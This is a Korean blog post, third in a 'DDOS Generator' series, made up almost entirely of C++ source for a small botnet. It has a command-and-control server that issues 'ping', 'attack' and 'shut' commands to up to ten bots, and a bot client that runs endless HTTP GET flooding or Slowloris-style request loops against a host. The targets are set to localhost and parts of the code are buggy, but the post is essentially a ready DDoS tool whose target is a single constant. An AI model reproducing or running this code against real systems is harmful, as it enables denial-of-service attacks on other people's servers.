본문 바로가기
Network/HTTP

DDOS Generator 3

by 수픽 2020. 4. 5.

C&C server

#define _WINSOCK_DEPRECATED_NO_WARNINGS

#include <iostream>
#include <thread>
#include <vector>
#include <queue>
#include <mutex>
#include <utility>
#include <winsock2.h>
#pragma comment(lib, "Ws2_32.lib")
using namespace std;

#define DEFAULT_BUFLEN 512
#define DEFAULT_PORT "27015"
#define MAX_BOTS 10	

class ThreadPool {
public:
	ThreadPool(size_t num_threads);
	~ThreadPool();
	void EnqueueJob(function<void()> job);

private:
	size_t num_threads;
	vector<thread> worker_threads;
	queue<function<void()>> jobs;
	mutex m;
	condition_variable cv;

	bool all_stop;
	void WorkerThread();
};


ThreadPool::ThreadPool(size_t nums) : num_threads(nums), all_stop(false) {	
	worker_threads.reserve(num_threads);
	for (size_t i = 0; i < num_threads; ++i) {
		worker_threads.emplace_back([this]() {this->WorkerThread(); });
	}
}

void ThreadPool::WorkerThread() {	
	while (true) {
		unique_lock<mutex> lock(m);
		cv.wait(lock, [this]() {return !this->jobs.empty() || all_stop; });
		if (all_stop && this->jobs.empty()) return;

		function<void()> job = move(jobs.front());
		jobs.pop();
		lock.unlock();

		job();
	}
}

void ThreadPool::EnqueueJob(function<void()> job) {	
	if (all_stop) {
		perror("ThreadPool interrupted");
	}
	unique_lock<mutex> lock(m);
	jobs.push(job);
	cv.notify_one();
}

ThreadPool::~ThreadPool() {
	all_stop = true;
	cv.notify_all();

	for (auto& t : worker_threads)
		t.join();
}

void work(SOCKET sock, char command[]) {	
	char recvbuf[DEFAULT_BUFLEN];
	int buflen = DEFAULT_BUFLEN;

	struct sockaddr_in addr;
	int addr_len;
	addr_len = sizeof(addr);

	SOCKET ClientSock = accept(sock, (struct sockaddr *)&addr, &addr_len);
	if (ClientSock == INVALID_SOCKET) {
		perror("accept fail");
		closesocket(ClientSock);
		return;
	}

	getpeername(ClientSock, (struct sockaddr *)&addr, &addr_len);
	cout << "bot accepted : " << inet_ntoa(addr.sin_addr) << "\n";
	//unique_lock<mutex> lock;

	if (send(ClientSock, command, buflen, 0) == SOCKET_ERROR) {
		perror("send fail");
		cout << WSAGetLastError << '\n';
		closesocket(ClientSock);
		return;
	}

	// lock.unlock();
	while (1) {
		memset(recvbuf, 0, buflen);
		if (recv(ClientSock, recvbuf, buflen, 0) > 0)
			cout << recvbuf << "\n";
		else {
			perror("return fail");
			return;
		}
		Sleep(1000);
	}

	closesocket(ClientSock);
}

void InitAndInput(char command[]) {	

	cout << "SWING's bare-bone DDOS Control Center\n";
	cout << "=============CHOOSE ONE===============\n";
	cout << "ping\nattack\nshut\n";
	cout << "======================================\n";

	while (1) {
		cout << ">> ";
		cin.getline(command, 10);

		if (!strcmp(command, "ping")) break;
		if (!strcmp(command, "attack")) {
			cout << "CHOOSE YOUR WEAPON.\n";
			cout << "1. HTTP Get Flooding\n";
			cout << "2. Slowloris\n";
			cout << ">> ";
			cin.getline(command, 10);
			break;
		}
		if (!strcmp(command, "shut")) break;
		cout << "wrong command. try again\n";
	}
}

int main() {
	WSADATA wsa;
	WSAStartup(MAKEWORD(2, 2), &wsa);

	SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
	sockaddr_in addr;

	if (sock == INVALID_SOCKET) {
		perror("socket error");
		return -1;
	}

	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = inet_addr("127.0.0.1");
	addr.sin_port = htons(atoi(DEFAULT_PORT));

	if (::bind(sock, (struct sockaddr *)&addr, sizeof(addr)) == SOCKET_ERROR) {
		perror("bind error");
		return -1;
	}

	if (listen(sock, SOMAXCONN) == SOCKET_ERROR) {
		perror("listen error");
		return -1;
	}

	char command[DEFAULT_BUFLEN];
	memset(command, 0, DEFAULT_BUFLEN);

	InitAndInput(command);
	cout << command << " started . . . \n";

	ThreadPool pool(MAX_BOTS);

	while (1) {
		pool.EnqueueJob([sock, command]() {work(sock, const_cast<char *> (command)); });
		Sleep(1000);
	}

}

 

bot (client)

#define WIN32_LEAN_AND_MEAN
#define _WINSOCK_DEPRECATED_NO_WARNINGS

#include <Windows.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdlib.h>
#include <stdio.h>

#pragma comment (lib, "ws2_32.lib");
#pragma comment (lib, "mswsock.lib");
#pragma comment (lib, "advapi32.lib");

#define DEFAULT_BUFLEN 512
#define DEFAULT_PORT "27015"
#define BUFF_SIZE 1024
#define PORT 80
#define IPADDR "127.0.0.1"


int iResult;

int getflooding() {
	char message[BUFF_SIZE];
	int len;
	char szBuf[2048];

	
	SOCKET sock = socket(PF_INET, SOCK_STREAM, 0);
	SOCKADDR_IN addr;

	if (sock == INVALID_SOCKET) {
		perror("Sock Error ");
		system("pause");
		return -1;
	}

	
	addr.sin_family = AF_INET; 
	addr.sin_port = htons(PORT); 
	addr.sin_addr.s_addr = inet_addr(IPADDR);
	
	if (connect(sock, (SOCKADDR*)&addr, sizeof(addr)) == SOCKET_ERROR) {
		printf("Not Connect \n");
		system("pause");
		return 1; 
	}

	memset(szBuf, 0, sizeof(szBuf));
	snprintf(szBuf, sizeof(szBuf),
		"GET / 127.0.0.1:80 http/1.1\r\n"
		"HOST: 127.0.0.1:80 \r\n"
		"Cache-Control: noCache\r\n"
		"\r\n"
	);
	

	int iResult2;

	while (1) {
		iResult2 = send(sock, szBuf, sizeof(szBuf), 0);
		send(sock, szBuf, sizeof(szBuf), 0);

		if (iResult2 == SOCKET_ERROR) {
			printf("send failed with error: %d\n", WSAGetLastError());
			memset(szBuf, 0, sizeof(szBuf));
			break;
		}

		printf("get flooding success\n\n");
	}
}

int sloworis() {
	char message[BUFF_SIZE];
	int len;

	SOCKET sock = socket(PF_INET, SOCK_STREAM, 0);
	SOCKADDR_IN addr;

	if (sock == INVALID_SOCKET) {
		perror("Sock Error ");
		system("pause");
		return -1;
	}

	addr.sin_family = AF_INET;
	addr.sin_port = htons(PORT);
	addr.sin_addr.s_addr = inet_addr(IPADDR);


	if (connect(sock, (SOCKADDR*)&addr, sizeof(addr)) == SOCKET_ERROR) {
		printf("Not Connect \n");
		system("pause");
		return 1;
	}

	char msg[1024] = "GET /?127.0.0.1 HTTP/1.1\r\n";

	struct hostent* host;
	host = gethostbyname("127.0.0.1");
	addr.sin_family = AF_INET;
	addr.sin_port = htons(80);
	addr.sin_addr.s_addr = inet_addr(inet_ntoa(*(struct in_addr*) * host->h_addr_list));

	while (1) {
		send(sock, msg, strlen(msg), 0);
		printf("sloworis attack success\n\n");
	}
}

int _cdecl main()
{
	WSADATA wsaData;
	SOCKET ConnectSocket = INVALID_SOCKET;
	
	iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
	if (iResult != 0) {
		printf("WSAStartup failed with error: %d\n", iResult);
		return 1;
	}
	printf("wsastartup finish\n");
	struct sockaddr_in addr;

	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = inet_addr("127.0.0.1");
	addr.sin_port = htons(atoi(DEFAULT_PORT));

	int recvbuflen = DEFAULT_BUFLEN;

	
	iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
	if (iResult != 0) {
		printf("WSAStartup failed with error: %d\n", iResult);
		return 1;
	}
		
	ConnectSocket = socket(PF_INET,SOCK_STREAM,0);
	if (ConnectSocket == INVALID_SOCKET) {
		printf("socket failed with error: %ld\n", WSAGetLastError());
		WSACleanup();
		return 1;
	}
	printf("socket finish\n");

	iResult = connect(ConnectSocket, (SOCKADDR*)&addr,sizeof(addr));
	printf("connect finish\n");
	if (iResult == SOCKET_ERROR) {
		closesocket(ConnectSocket);
		ConnectSocket = INVALID_SOCKET;
	} 

	if (ConnectSocket == INVALID_SOCKET) {
		printf("Unable to connect to server!\n");
		WSACleanup();
		return 1;
	}

	char recvbuf[DEFAULT_BUFLEN];
	int buflen = DEFAULT_BUFLEN;
	char message[5] = "pong";
	char message2[10] = "try again";

	while (1) {
		recv(ConnectSocket, recvbuf, buflen, 0);
		if (strcmp(recvbuf, "ping") == 0) {
			send(ConnectSocket, message, (int)strlen(message), 0);
			break;
		}

		else if (strcmp(recvbuf, "1") == 0) {
			getflooding();
		}
		else if (strcmp(recvbuf, "2") == 0) {
			sloworis();
		}

		else send(ConnectSocket, message2, (int)strlen(message2), 0);
	}

	closesocket(ConnectSocket);
	WSACleanup();

	return 0;
}

 

결과

1. ping 선택시

 

2. get flooding attack 선택시

 

 

 

3. sloworis attack 선택시

'Network > HTTP' 카테고리의 다른 글

DDOS Generator 2  (0) 2020.03.30
Thread Pool  (0) 2020.03.22
멀티 스레딩  (0) 2020.03.16
HTTP 서버  (0) 2020.03.09
Socket Programming  (0) 2020.03.02

관련글

티스토리툴바